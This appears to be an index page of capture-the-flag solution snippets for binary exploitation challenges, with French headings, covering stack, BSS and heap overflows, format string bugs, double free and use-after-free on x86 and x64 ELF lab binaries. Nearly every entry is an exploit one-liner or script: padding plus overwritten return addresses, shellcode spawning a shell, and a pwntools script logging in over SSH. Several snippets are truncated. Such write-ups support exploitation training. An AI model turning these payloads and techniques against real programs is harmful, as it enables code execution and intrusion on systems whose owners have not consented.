Skip to main content

Exploitation de binaire avancé

ELF x86 - Stack buffer overflow basic 2

$ (python -c 'print "A"*128 +"\x64\x84\x04\x08" ' ;cat) | ./ch15

ELF x64 - Stack buffer overflow - basic

$ (python -c 'print "A"*280+"\xcd\x06\x40\x00\x00\x00\x00\x00"'; cat) | ./ch35

ELF x86 - Format string bug basic 2

import struct CHECK_ADDR = <addr> exploit = "" exploit += struct.pack("I", CHECK_ADDR) #...

ELF x64 - Stack buffer overflow - PIE

shell 1: app-systeme-ch83@challenge03:~$ python -c 'import struct; print("A"*0x28 + struct.pack("...

ELF x86 - BSS buffer overflow

./ch7 `python -c 'print "\x90"*483 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x6...

ELF x64 - Basic heap overflow

import pwn USER = "app-systeme-ch94" PASS = "app-systeme-ch94" def main(): s = pwn.ssh(USER, "ch...

ELF x64 - Double free

"1 → 5 → 1 → 3 → 7 → 1 → 4 → 5 → 1 → 5 → 2 → 1 → 7 → 1"

ELF x86 - Use After Free - basic

app-systeme-ch63@challenge03:~$ printf "1\ntoto\n4\n5\nAAAABBBBCCCC\xcb\x87\x04\ x08\nhome\n7\n3\...

ELF x86 - Stack buffer overflow basic 6

app-systeme-ch33@challenge02:~$ ./ch33 $(python -c 'print "A"*32 + "\xb0\x70\xe6\xb7" + "\xf0\xab...

ELF x86 - Format String Bug Basic 3

app-systeme-ch17@challenge02:~$ export SHELLCODE=`python -c 'print("\x6a\x0b\x58\x99\x52\x66\x68\...
Back to top